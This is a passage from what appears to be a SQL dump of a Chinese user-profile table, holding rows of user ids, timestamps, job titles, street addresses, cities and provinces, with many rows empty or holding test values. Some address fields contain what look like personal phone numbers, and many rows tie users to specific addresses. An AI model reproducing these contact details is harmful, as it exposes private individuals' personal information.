09:54:24',2,'企业管理者',NULL,NULL,NULL,'铜仁',1075,'',NULL,'贵州'),(47,48,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2019-08-06 09:24:30','2021-03-08 10:28:38',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'北京'),(48,49,NULL,'?',0,'幸福大街102',NULL,NULL,NULL,'2019-08-07 09:33:05','2020-09-17 15:21:37',0,'教授',NULL,NULL,NULL,'东城',1976,'',NULL,'北京'),(49,50,NULL,NULL,0,'1',NULL,NULL,NULL,'2019-08-07 09:37:08','2019-08-07 14:56:47',0,'教授',NULL,NULL,NULL,'长春',2309,'',NULL,'吉林'),(50,51,NULL,NULL,0,'',NULL,NULL,NULL,'2019-08-07 14:53:28','2019-08-07 14:58:36',2,'部门管理者',NULL,NULL,NULL,'海淀',118,'',NULL,'北京'),(51,52,NULL,NULL,0,'1366736491',NULL,NULL,NULL,'2019-08-07 15:44:39','2019-09-18 15:43:32',0,'教授',NULL,NULL,NULL,'东城',447,'',NULL,'北京'),(52,53,NULL,NULL,0,'崇明岛西安路23号',NULL,NULL,NULL,'2019-08-13 09:30:25','2019-08-13 10:47:40',1,NULL,'201804030201',NULL,NULL,'崇明',447,'',NULL,'上海'),(53,54,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-08-14 16:50:06','2019-08-14 16:51:28',2,'企业管理者',NULL,NULL,NULL,NULL,117,'',NULL,NULL),(54,55,NULL,NULL,0,'湖南长沙',NULL,NULL,NULL,'2019-08-17 08:59:42','2020-02-03 19:41:20',0,'副教授',NULL,NULL,NULL,'长沙',982,'',NULL,'湖南'),(55,56,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-09-16 09:59:25','2019-09-16 10:30:19',0,'教授',NULL,NULL,NULL,NULL,3162,'',NULL,NULL),(56,57,NULL,NULL,0,'广州大学城',NULL,NULL,NULL,'2019-10-10 16:48:10','2019-10-10 16:48:34',NULL,NULL,NULL,NULL,NULL,'广州',NULL,'',NULL,'广东'),(57,58,NULL,NULL,0,'大黄村',NULL,NULL,NULL,'2019-10-19 09:24:20','2019-10-19 09:24:44',NULL,NULL,NULL,NULL,NULL,'石家庄',NULL,'',NULL,'河北'),(59,60,NULL,NULL,1,'雨花区绿地之窗',NULL,NULL,NULL,'2019-10-29 10:00:26','2019-10-29 10:01:16',NULL,NULL,NULL,NULL,NULL,'长沙',NULL,'',NULL,'湖南'),(60,61,NULL,NULL,0,'555',NULL,NULL,NULL,'2019-10-29 17:07:24','2019-10-29 17:13:06',NULL,NULL,NULL,NULL,NULL,'毕节',NULL,'',NULL,'贵州'),(61,62,NULL,NULL,1,'1455',NULL,NULL,NULL,'2019-10-29 17:08:25','2019-10-29 17:10:35',NULL,NULL,NULL,NULL,NULL,'海淀',NULL,'',NULL,'北京'),(62,63,NULL,NULL,1,'145',NULL,NULL,NULL,'2019-10-31 18:37:10','2019-11-01 11:02:00',NULL,NULL,NULL,NULL,NULL,'儋县',NULL,'',NULL,'海南'),(63,64,NULL,NULL,0,'567',NULL,NULL,NULL,'2019-10-31 18:37:10','2019-11-01 11:09:15',NULL,NULL,NULL,NULL,NULL,'临安',NULL,'',NULL,'浙江'),(64,65,NULL,NULL,0,'890',NULL,NULL,NULL,'2019-10-31 18:37:10','2019-11-01 11:10:38',NULL,NULL,NULL,NULL,NULL,'贵阳',NULL,'',NULL,'贵州'),(65,66,NULL,NULL,0,'555',NULL,NULL,NULL,'2019-10-31 18:37:10','2019-11-01 11:11:38',NULL,NULL,NULL,NULL,NULL,'南宁',NULL,'',NULL,'广西'),(66,67,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2019-10-31 18:37:11','2019-10-31 18:37:11',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(67,68,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2019-10-31 18:37:11','2019-10-31 18:37:11',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(68,69,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2019-10-31 18:37:11','2019-10-31 18:37:11',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(69,70,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2019-10-31 18:37:11','2019-10-31 18:37:11',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(70,71,NULL,NULL,0,'567',NULL,NULL,NULL,'2019-10-31 18:37:11','2019-11-05 15:35:33',NULL,NULL,NULL,NULL,NULL,'黄浦',NULL,'',NULL,'上海'),(72,73,NULL,NULL,0,'发送到',NULL,NULL,NULL,'2019-11-25 11:25:31','2019-11-25 12:46:10',NULL,NULL,NULL,NULL,NULL,'崇明',NULL,'',NULL,'上海'),(73,74,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-02-01 12:47:12','2020-02-01 12:47:12',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(74,75,NULL,NULL,0,'滨海新区瑞达公寓',NULL,NULL,NULL,'2020-02-01 18:52:39','2020-02-01 18:53:33',NULL,NULL,NULL,NULL,NULL,'天津',NULL,'',NULL,'天津'),(75,76,NULL,NULL,0,'馨怡宾馆2210',NULL,NULL,NULL,'2020-02-01 20:34:46','2020-02-01 20:35:23',NULL,NULL,NULL,NULL,NULL,'海淀',NULL,'',NULL,'北京'),(76,77,NULL,NULL,0,'滨海新区开发区',NULL,NULL,NULL,'2020-02-01 22:26:36','2020-02-01 22:27:09',NULL,NULL,NULL,NULL,NULL,'天津',NULL,'',NULL,'天津'),(77,78,NULL,NULL,1,'开福区',NULL,NULL,NULL,'2020-02-03 17:19:19','2020-02-03 17:19:51',NULL,NULL,NULL,NULL,NULL,'长沙',NULL,'',NULL,'湖南'),(78,79,NULL,NULL,0,'泰达外包产业园8栋8',NULL,NULL,NULL,'2020-02-04 22:00:19','2020-02-04 22:21:30',NULL,NULL,NULL,NULL,NULL,'天津',NULL,'',NULL,'天津'),(79,80,NULL,NULL,1,'开发区',NULL,NULL,NULL,'2020-02-04 22:09:45','2020-02-04 22:16:34',NULL,NULL,NULL,NULL,NULL,'塘沽',NULL,'',NULL,'天津'),(80,81,NULL,NULL,0,'东大街53号院',NULL,NULL,NULL,'2020-02-05 10:29:30','2020-02-05 10:32:08',NULL,NULL,NULL,NULL,NULL,'丰台',NULL,'',NULL,'北京'),(81,82,NULL,NULL,0,'北京海淀永定路169',NULL,NULL,NULL,'2020-02-05 10:30:48','2020-02-05 10:32:12',NULL,NULL,NULL,NULL,NULL,'海淀',NULL,'',NULL,'北京'),(82,83,NULL,NULL,0,'科星西路19号院',NULL,NULL,NULL,'2020-02-05 10:31:59','2020-02-10 10:25:44',NULL,NULL,NULL,NULL,NULL,'昌平',NULL,'',NULL,'北京'),(83,84,NULL,NULL,0,'天津市滨海新区生态城',NULL,NULL,NULL,'2020-02-05 10:33:10','2020-02-05 10:52:26',NULL,NULL,NULL,NULL,NULL,'天津',NULL,'',NULL,'天津'),(84,85,NULL,NULL,0,'丰台东大街53号',NULL,NULL,NULL,'2020-02-05 10:35:26','2020-02-05 10:36:28',NULL,NULL,NULL,NULL,NULL,'丰台',NULL,'',NULL,'北京'),(85,86,NULL,NULL,0,'东大街53号院',NULL,NULL,NULL,'2020-02-05 10:38:36','2020-02-05 10:40:47',NULL,NULL,NULL,NULL,NULL,'丰台',NULL,'',NULL,'北京'),(86,87,NULL,NULL,0,'泰达外包产业园8号楼',NULL,NULL,NULL,'2020-02-05 10:39:59','2020-02-05 10:41:40',NULL,NULL,NULL,NULL,NULL,'塘沽',NULL,'',NULL,'天津'),(87,88,NULL,NULL,0,'永定路169号',NULL,NULL,NULL,'2020-02-05 10:43:18','2020-02-05 10:44:43',NULL,NULL,NULL,NULL,NULL,'海淀',NULL,'',NULL,'北京'),(88,89,NULL,NULL,1,'滨海新区信环西路19',NULL,NULL,NULL,'2020-02-05 10:54:45','2020-02-05 10:57:59',NULL,NULL,NULL,NULL,NULL,'天津',NULL,'',NULL,'天津'),(89,90,NULL,NULL,0,'清华大学普吉楼',NULL,NULL,NULL,'2020-02-05 10:54:48','2020-02-05 10:55:33',NULL,NULL,NULL,NULL,NULL,'海淀',NULL,'',NULL,'北京'),(90,91,NULL,NULL,0,'北京市海淀区',NULL,NULL,NULL,'2020-02-05 10:55:15','2020-02-05 10:55:47',NULL,NULL,NULL,NULL,NULL,'海淀',NULL,'',NULL,'北京'),(91,92,NULL,NULL,0,'天津滨海军民融合人工',NULL,NULL,NULL,'2020-02-05 10:56:00','2020-02-05 10:57:05',NULL,NULL,NULL,NULL,NULL,'塘沽',NULL,'',NULL,'天津'),(92,93,NULL,NULL,1,'滨海新区泰达外包产业',NULL,NULL,NULL,'2020-02-05 10:58:38','2020-02-05 10:59:44',NULL,NULL,NULL,NULL,NULL,'天津',NULL,'',NULL,'天津'),(93,94,NULL,NULL,0,'天河科技园7号楼',NULL,NULL,NULL,'2020-02-05 11:02:30','2020-02-05 11:03:06',NULL,NULL,NULL,NULL,NULL,'塘沽',NULL,'',NULL,'天津'),(94,95,NULL,NULL,0,'东大街53号',NULL,NULL,NULL,'2020-02-05 11:05:02','2020-02-05 11:05:50',NULL,NULL,NULL,NULL,NULL,'丰台',NULL,'',NULL,'北京'),(95,96,NULL,NULL,0,'大成路13号',NULL,NULL,NULL,'2020-02-05 11:24:55','2020-02-05 11:25:59',NULL,NULL,NULL,NULL,NULL,'丰台',NULL,'',NULL,'北京'),(96,97,NULL,NULL,0,'东大街53号院',NULL,NULL,NULL,'2020-02-05 11:41:14','2020-02-05 11:43:12',NULL,NULL,NULL,NULL,NULL,'丰台',NULL,'',NULL,'北京'),(97,98,NULL,NULL,0,'0',NULL,NULL,NULL,'2020-02-05 12:24:57','2020-02-11 10:01:32',NULL,NULL,NULL,NULL,NULL,'海淀',NULL,'',NULL,'北京'),(98,99,NULL,NULL,0,'泰达服务外包园',NULL,NULL,NULL,'2020-02-05 14:48:32','2020-02-05 14:52:38',NULL,NULL,NULL,NULL,NULL,'天津',NULL,'',NULL,'天津'),(99,100,NULL,NULL,1,'泰达外包产业园7号楼',NULL,NULL,NULL,'2020-02-05 14:53:15','2020-02-05 15:00:12',NULL,NULL,NULL,NULL,NULL,'天津',NULL,'',NULL,'天津'),(100,101,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-02-05 15:22:57','2020-02-05 15:22:57',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(101,102,NULL,NULL,1,'河西区',NULL,NULL,NULL,'2020-02-05 16:25:27','2020-02-05 16:26:54',NULL,NULL,NULL,NULL,NULL,'天津',NULL,'',NULL,'天津'),(102,103,NULL,NULL,0,'永定路169号',NULL,NULL,NULL,'2020-02-10 12:21:33','2020-02-10 12:22:13',NULL,NULL,NULL,NULL,NULL,'海淀',NULL,'',NULL,'北京'),(103,104,NULL,NULL,1,'泰达外包园1号楼',NULL,NULL,NULL,'2020-03-19 13:54:38','2020-03-19 13:55:56',NULL,NULL,NULL,NULL,NULL,'天津',NULL,'',NULL,'天津'),(104,105,NULL,NULL,0,'天津市滨海新区天河科',NULL,NULL,NULL,'2020-03-19 15:08:51','2020-03-19 15:09:33',NULL,NULL,NULL,NULL,NULL,'天津',NULL,'',NULL,'天津'),(105,106,NULL,NULL,0,'信环西路19号',NULL,NULL,NULL,'2020-03-19 15:09:00','2020-03-19 15:11:48',NULL,NULL,NULL,NULL,NULL,'天津',NULL,'',NULL,'天津'),(106,107,NULL,NULL,1,'滨海新区',NULL,NULL,NULL,'2020-03-19 15:10:11','2020-03-19 15:11:29',NULL,NULL,NULL,NULL,NULL,'天津',NULL,'',NULL,'天津'),(107,108,NULL,NULL,1,'天津市',NULL,NULL,NULL,'2020-03-19 15:12:55','2020-03-19 15:15:50',NULL,NULL,NULL,NULL,NULL,'天津',NULL,'',NULL,'天津'),(108,109,NULL,NULL,0,'瑞达公寓',NULL,NULL,NULL,'2020-03-19 15:13:24','2020-03-19 15:13:55',NULL,NULL,NULL,NULL,NULL,'天津',NULL,'',NULL,'天津'),(109,110,NULL,NULL,0,'东大街53号',NULL,NULL,NULL,'2020-03-23 08:27:59','2020-03-23 08:30:01',NULL,NULL,NULL,NULL,NULL,'丰台',NULL,'',NULL,'北京'),(110,111,NULL,NULL,0,'1571143722',NULL,NULL,NULL,'2020-07-03 11:51:05','2020-07-06 14:41:12',NULL,NULL,NULL,NULL,NULL,'长沙',NULL,'',NULL,'湖南'),(111,113,NULL,NULL,1,'丰台区',NULL,NULL,NULL,'2020-08-12 10:41:20','2020-08-12 10:41:55',NULL,NULL,NULL,NULL,NULL,'东城',NULL,'',NULL,'北京'),(112,115,NULL,NULL,1,'北京市丰台区东大街',NULL,NULL,NULL,'2020-08-14 08:58:42','2020-08-14 08:59:38',NULL,NULL,NULL,NULL,NULL,'丰台',NULL,'',NULL,'北京'),(113,116,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-09-29 17:20:40','2020-09-29 17:20:40',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(114,117,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-10-21 16:47:58','2020-10-21 16:47:58',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(115,118,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-12-01 18:18:16','2020-12-01 18:18:16',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(116,119,NULL,NULL,0,'海淀',NULL,NULL,NULL,'2020-12-02 13:18:32','2020-12-24 12:15:46',NULL,NULL,NULL,NULL,NULL,'东城',NULL,'',NULL,'北京'),(117,120,NULL,NULL,0,'涪城区二环路南段6号',NULL,NULL,NULL,'2020-12-14 14:31:53','2021-01-26 17:31:15',NULL,NULL,NULL,NULL,NULL,'绵阳',NULL,'',NULL,'四川'),(118,121,NULL,'一点都不懒,什么也不留下',0,'涪城区剑门路西段',NULL,NULL,NULL,'2020-12-16 16:06:31','2020-12-17 08:27:35',NULL,NULL,NULL,NULL,NULL,'绵阳',NULL,'',NULL,'四川'),(119,122,NULL,NULL,0,'气动中心',NULL,NULL,NULL,'2020-12-16 18:54:54','2020-12-16 18:57:53',NULL,NULL,NULL,NULL,NULL,'绵阳',NULL,'',NULL,'四川'),(120,123,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-12-17 10:03:56','2020-12-17 10:03:56',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(121,124,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-12-17 11:17:58','2020-12-17 11:17:58',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(122,125,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-12-17 11:22:00','2020-12-17 11:22:00',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(123,126,NULL,NULL,0,'长安区',NULL,NULL,NULL,'2020-12-18 18:53:33','2020-12-18 18:54:16',NULL,NULL,NULL,NULL,NULL,'西安',NULL,'',NULL,'陕西'),(124,127,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-12-22 19:48:05','2020-12-22 19:48:05',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(125,128,NULL,NULL,0,'3',NULL,NULL,NULL,'2020-12-24 15:19:18','2020-12-24 17:51:44',NULL,NULL,NULL,NULL,NULL,'长沙',NULL,'',NULL,'湖南'),(126,129,NULL,NULL,0,'北京某地',NULL,NULL,NULL,'2020-12-27 11:43:54','2020-12-27 11:45:58',NULL,NULL,NULL,NULL,NULL,'东城',NULL,'',NULL,'北京'),(127,130,NULL,NULL,0,'花从小猫',NULL,NULL,NULL,'2020-12-28 11:28:50','2020-12-28 11:29:18',NULL,NULL,NULL,NULL,NULL,'长沙',NULL,'',NULL,'湖南'),(128,131,NULL,NULL,0,'西城区月坛北小街2号',NULL,NULL,NULL,'2020-12-29 11:32:47','2020-12-29 11:34:00',NULL,NULL,NULL,NULL,NULL,'西城',NULL,'',NULL,'北京'),(129,132,NULL,NULL,NULL,'',NULL,NULL,NULL,'2020-12-29 15:12:24','2021-01-06 02:24:09',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(130,133,NULL,'1111',1,'岳麓区',NULL,NULL,NULL,'2020-12-29 15:21:31','2021-03-09 17:16:38',NULL,NULL,NULL,NULL,NULL,'长沙',NULL,'',NULL,'湖南'),(131,134,NULL,NULL,1,'岳麓区',NULL,NULL,NULL,'2020-12-29 15:24:04','2020-12-29 15:24:33',NULL,NULL,NULL,NULL,NULL,'长沙',NULL,'',NULL,'湖南'),(132,135,NULL,NULL,0,'湖南长沙',NULL,NULL,NULL,'2020-12-30 10:05:30','2020-12-30 10:05:53',NULL,NULL,NULL,NULL,NULL,'长沙',NULL,'',NULL,'湖南'),(133,136,NULL,NULL,0,'北京',NULL,NULL,NULL,'2021-01-05 10:33:26','2021-01-05 10:33:49',NULL,NULL,NULL,NULL,NULL,'东城',NULL,'',NULL,'北京'),(134,137,NULL,NULL,0,'涪城区剑门路西段',NULL,NULL,NULL,'2021-01-05 18:41:43','2021-01-05 18:43:29',NULL,NULL,NULL,NULL,NULL,'绵阳',NULL,'',NULL,'四川'),(135,138,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-01-06 10:52:46','2021-01-06 10:52:46',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(136,139,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-01-06 11:04:59','2021-01-06 11:04:59',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(137,140,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-01-06 11:12:28','2021-01-06 11:12:28',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(138,141,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-01-06 11:21:36','2021-01-06 11:21:36',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(139,142,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-01-06 11:29:06','2021-01-06 11:29:06',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(140,143,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-01-06 11:39:56','2021-01-06 11:39:56',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(141,144,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-01-06 11:47:58','2021-01-06 11:47:58',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(142,145,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-01-06 14:02:22','2021-01-06 14:02:22',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(143,146,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-01-06 06:25:07','2021-01-06 06:25:07',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(144,147,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-01-06 14:44:32','2021-01-06 14:44:32',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(145,148,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-01-06 14:55:48','2021-01-06 14:55:48',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(146,149,NULL,NULL,0,'sdfasdf',NULL,NULL,NULL,'2021-01-06 15:44:03','2021-01-06 15:44:15',NULL,NULL,NULL,NULL,NULL,'抚州',NULL,'',NULL,'江西'),(147,150,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-01-06 15:49:27','2021-01-06 15:49:27',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(148,151,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-01-06 16:24:56','2021-01-06 16:24:56',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(149,152,NULL,NULL,0,'气动中心',NULL,NULL,NULL,'2021-01-07 15:22:45','2021-01-08 15:43:28',NULL,NULL,NULL,NULL,NULL,'绵阳',NULL,'',NULL,'四川'),(150,153,NULL,NULL,0,'海淀区海淀路',NULL,NULL,NULL,'2021-01-13 11:04:29','2021-01-13 11:04:59',NULL,NULL,NULL,NULL,NULL,'海淀',NULL,'',NULL,'北京'),(151,154,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-01-14 03:51:26','2021-01-14 03:51:26',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(152,155,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-01-22 15:35:26','2021-01-22 15:35:26',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(153,156,NULL,NULL,0,'涪城区二环路南段6号',NULL,NULL,NULL,'2021-01-26 09:20:08','2021-01-26 10:44:51',NULL,NULL,NULL,NULL,NULL,'绵阳',NULL,'',NULL,'四川'),(154,157,NULL,NULL,0,'中国空气动力中心',NULL,NULL,NULL,'2021-01-26 18:22:00','2021-01-26 18:22:53',NULL,NULL,NULL,NULL,NULL,'绵阳',NULL,'',NULL,'四川'),(155,158,NULL,NULL,0,'游仙区',NULL,NULL,NULL,'2021-01-28 15:58:35','2021-01-28 15:59:43',NULL,NULL,NULL,NULL,NULL,'绵阳',NULL,'',NULL,'四川'),(156,159,NULL,NULL,0,'二环路南段',NULL,NULL,NULL,'2021-01-28 18:25:28','2021-01-28 18:27:12',NULL,NULL,NULL,NULL,NULL,'绵阳',NULL,'',NULL,'四川'),(157,160,NULL,NULL,1,'涪城区',NULL,NULL,NULL,'2021-01-28 23:13:23','2021-01-28 23:14:09',NULL,NULL,NULL,NULL,NULL,'绵阳',NULL,'',NULL,'四川'),(158,161,NULL,NULL,0,'开福区德雅路109号',NULL,NULL,NULL,'2021-02-20 09:25:51','2021-02-20 09:26:43',NULL,NULL,NULL,NULL,NULL,'长沙',NULL,'',NULL,'湖南'),(159,162,NULL,NULL,0,'航天三院',NULL,NULL,NULL,'2021-02-20 09:26:03','2021-02-20 09:27:10',NULL,NULL,NULL,NULL,NULL,'丰台',NULL,'',NULL,'北京'),(160,163,NULL,NULL,0,'沪南公路2688弄',NULL,NULL,NULL,'2021-02-20 09:32:12','2021-02-20 09:32:58',NULL,NULL,NULL,NULL,NULL,'浦东',NULL,'',NULL,'上海'),(161,164,NULL,NULL,0,'顺德大良新城顺峰山',NULL,NULL,NULL,'2021-02-20 09:37:18','2021-02-20 09:38:38',NULL,NULL,NULL,NULL,NULL,'佛山',NULL,'',NULL,'广东'),(162,165,NULL,NULL,0,'经济技术开发区',NULL,NULL,NULL,'2021-02-20 09:43:56','2021-02-20 09:45:21',NULL,NULL,NULL,NULL,NULL,'烟台',NULL,'',NULL,'山东'),(163,166,NULL,NULL,0,'广州大学城',NULL,NULL,NULL,'2021-02-20 09:44:37','2021-02-20 09:45:30',NULL,NULL,NULL,NULL,NULL,'广州',NULL,'',NULL,'广东'),(164,167,NULL,NULL,0,'二环路南段6号',NULL,NULL,NULL,'2021-02-20 09:48:11','2021-02-20 09:48:45',NULL,NULL,NULL,NULL,NULL,'绵阳',NULL,'',NULL,'四川'),(165,168,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-02-20 09:58:40','2021-02-20 09:58:40',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(166,169,NULL,NULL,0,'金牛区金科东路50号',NULL,NULL,NULL,'2021-02-20 10:13:42','2021-02-20 10:14:23',NULL,NULL,NULL,NULL,NULL,'成都',NULL,'',NULL,'四川'),(167,170,NULL,NULL,0,'北京市',NULL,NULL,NULL,'2021-02-20 10:34:59','2021-02-20 10:36:05',NULL,NULL,NULL,NULL,NULL,'怀柔',NULL,'',NULL,'北京'),(168,171,NULL,NULL,0,'江苏大学能动学院',NULL,NULL,NULL,'2021-02-20 10:41:53','2021-02-20 10:42:39',NULL,NULL,NULL,NULL,NULL,'镇江',NULL,'',NULL,'江苏'),(169,172,NULL,NULL,0,'鼓楼区草场门大街',NULL,NULL,NULL,'2021-02-20 11:02:05','2021-02-20 11:04:31',NULL,NULL,NULL,NULL,NULL,'南京',NULL,'',NULL,'江苏'),(170,173,NULL,NULL,0,'abc',NULL,NULL,NULL,'2021-02-20 13:26:03','2021-02-20 13:26:36',NULL,NULL,NULL,NULL,NULL,'东城',NULL,'',NULL,'北京'),(171,174,NULL,NULL,0,'这你也要知道?',NULL,NULL,NULL,'2021-02-20 14:13:03','2021-02-20 14:14:05',NULL,NULL,NULL,NULL,NULL,'宝山',NULL,'',NULL,'上海'),(172,175,NULL,NULL,0,'浙大玉泉校区',NULL,NULL,NULL,'2021-02-20 14:22:16','2021-02-20 14:22:46',NULL,NULL,NULL,NULL,NULL,'杭州',NULL,'',NULL,'浙江'),(173,176,NULL,NULL,0,'南京理工大学',NULL,NULL,NULL,'2021-02-20 19:46:56','2021-02-20 19:47:53',NULL,NULL,NULL,NULL,NULL,'南京',NULL,'',NULL,'江苏'),(174,177,NULL,NULL,0,'西安交通大学',NULL,NULL,NULL,'2021-02-21 14:02:23','2021-02-21 14:05:33',NULL,NULL,NULL,NULL,NULL,'西安',NULL,'',NULL,'陕西'),(175,178,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-02-22 22:37:00','2021-02-22 22:37:00',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(176,179,NULL,NULL,0,'西北工业大学',NULL,NULL,NULL,'2021-02-24 14:52:39','2021-02-24 14:53:30',NULL,NULL,NULL,NULL,NULL,'西安',NULL,'',NULL,'陕西'),(177,180,NULL,NULL,0,'南岗区一曼街2号',NULL,NULL,NULL,'2021-02-24 17:51:46','2021-02-24 17:58:46',NULL,NULL,NULL,NULL,NULL,'哈尔滨',NULL,'',NULL,'黑龙江'),(178,181,NULL,NULL,1,'西三环北路72号世纪经贸大厦B座518室',NULL,NULL,NULL,'2021-02-25 08:42:05','2021-03-03 10:59:23',NULL,NULL,NULL,NULL,NULL,'海淀',NULL,'',NULL,'北京'),(179,182,NULL,NULL,0,'asdfa',NULL,NULL,NULL,'2021-02-25 08:49:07','2021-02-25 08:49:45',NULL,NULL,NULL,NULL,NULL,'静安',NULL,'',NULL,'上海'),(180,183,NULL,NULL,0,'沙河高教园',NULL,NULL,NULL,'2021-02-25 14:01:01','2021-02-25 14:01:27',NULL,NULL,NULL,NULL,NULL,'昌平',NULL,'',NULL,'北京'),(181,184,NULL,NULL,1,'磁器口',NULL,NULL,NULL,'2021-02-26 10:24:40','2021-02-26 10:25:47',NULL,NULL,NULL,NULL,NULL,'渝中',NULL,'',NULL,'重庆'),(182,185,NULL,NULL,0,'开福区109号',NULL,NULL,NULL,'2021-02-26 20:15:44','2021-02-26 20:16:29',NULL,NULL,NULL,NULL,NULL,'长沙',NULL,'',NULL,'湖南'),(183,186,NULL,NULL,1,'陕西省西安市',NULL,NULL,NULL,'2021-03-01 19:03:56','2021-03-01 19:11:21',NULL,NULL,NULL,NULL,NULL,'西安',NULL,'',NULL,'陕西'),(184,187,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-01 22:07:13','2021-03-01 22:07:13',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(185,189,NULL,NULL,0,'御道街29号',NULL,NULL,NULL,'2021-03-03 07:35:42','2021-03-03 07:36:45',NULL,NULL,NULL,NULL,NULL,'南京',NULL,'',NULL,'江苏'),(186,190,NULL,NULL,0,'北京市海淀区北四环西路15号 中国科学院力学研究所',NULL,NULL,NULL,'2021-03-04 10:12:27','2021-03-04 10:13:35',NULL,NULL,NULL,NULL,NULL,'海淀',NULL,'',NULL,'北京'),(187,191,NULL,NULL,0,'浙江大学',NULL,NULL,NULL,'2021-03-04 10:16:31','2021-03-04 10:16:53',NULL,NULL,NULL,NULL,NULL,'杭州',NULL,'',NULL,'浙江'),(188,192,NULL,NULL,0,'蜀山区香樟大道199号',NULL,NULL,NULL,'2021-03-04 10:17:21','2021-03-04 10:17:57',NULL,NULL,NULL,NULL,NULL,'合肥',NULL,'',NULL,'安徽'),(189,193,NULL,NULL,0,'秦淮区御道街29号南京航空航天大学明故宫校区',NULL,NULL,NULL,'2021-03-04 10:19:53','2021-03-04 10:20:34',NULL,NULL,NULL,NULL,NULL,'南京',NULL,'',NULL,'江苏'),(190,194,NULL,NULL,0,'天津大学',NULL,NULL,NULL,'2021-03-04 10:19:59','2021-03-04 10:20:42',NULL,NULL,NULL,NULL,NULL,'天津',NULL,'',NULL,'天津'),(191,195,NULL,NULL,0,'西湖区',NULL,NULL,NULL,'2021-03-04 10:20:06','2021-03-04 10:20:38',NULL,NULL,NULL,NULL,NULL,'杭州',NULL,'',NULL,'浙江'),(192,196,NULL,NULL,0,'玄武区孝陵卫200号',NULL,NULL,NULL,'2021-03-04 10:27:32','2021-03-04 10:28:08',NULL,NULL,NULL,NULL,NULL,'南京',NULL,'',NULL,'江苏'),(193,197,NULL,NULL,0,'13652081916',NULL,NULL,NULL,'2021-03-04 10:28:07','2021-03-04 10:29:16',NULL,NULL,NULL,NULL,NULL,'昌平',NULL,'',NULL,'北京'),(194,198,NULL,NULL,0,'海淀区学院路37号',NULL,NULL,NULL,'2021-03-04 10:29:41','2021-03-04 10:30:39',NULL,NULL,NULL,NULL,NULL,'海淀',NULL,'',NULL,'北京'),(195,199,NULL,NULL,0,'明德一路8号',NULL,NULL,NULL,'2021-03-04 10:42:07','2021-03-04 